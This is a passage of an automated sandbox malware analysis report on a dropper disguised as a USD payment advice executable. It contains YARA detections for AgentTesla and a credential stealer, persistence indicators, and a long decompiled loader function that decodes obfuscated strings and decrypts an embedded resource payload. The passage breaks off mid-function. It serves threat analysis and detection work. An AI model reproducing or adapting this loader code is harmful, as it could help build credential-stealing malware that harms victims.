                                                                                                                                                MD5 hash:5D3D23738B2B4BB1F7FE3371EA7ECC76
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.935435728.0000000003471000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.933607178.0000000002400000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.933280290.0000000002234000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000003.694028712.00000000006BD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.937725779.0000000004EC0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: Owdpdrv.exe PID: 6760 Parent PID: 3424

                                                                                                                                                General

                                                                                                                                                Start time:11:27:05
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe'
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1346928 bytes
                                                                                                                                                MD5 hash:5D3D23738B2B4BB1F7FE3371EA7ECC76
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000005.00000002.783743346.0000000002C67000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                                                                                • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: 00000005.00000002.783743346.0000000002C67000.00000020.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 17%, ReversingLabs
                                                                                                                                                Reputation:low

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: Owdpdrv.exe PID: 6872 Parent PID: 3424

                                                                                                                                                General

                                                                                                                                                Start time:11:27:14
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe'
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1346928 bytes
                                                                                                                                                MD5 hash:5D3D23738B2B4BB1F7FE3371EA7ECC76
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Reputation:low

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: Owdpdrv.exe PID: 4800 Parent PID: 6760

                                                                                                                                                General

                                                                                                                                                Start time:11:27:27
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1346928 bytes
                                                                                                                                                MD5 hash:5D3D23738B2B4BB1F7FE3371EA7ECC76
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.932033702.00000000021F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000003.767263953.00000000004C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.935842915.0000000004F00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.934613196.0000000003531000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.935490984.0000000004970000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Chronological Activities

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >

                                                                                                                                                  Analysis Process: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE PID: 4460 Parent PID: 3912 USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECOMMON

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 004019F0, Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                  			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543);
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x76e3cf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
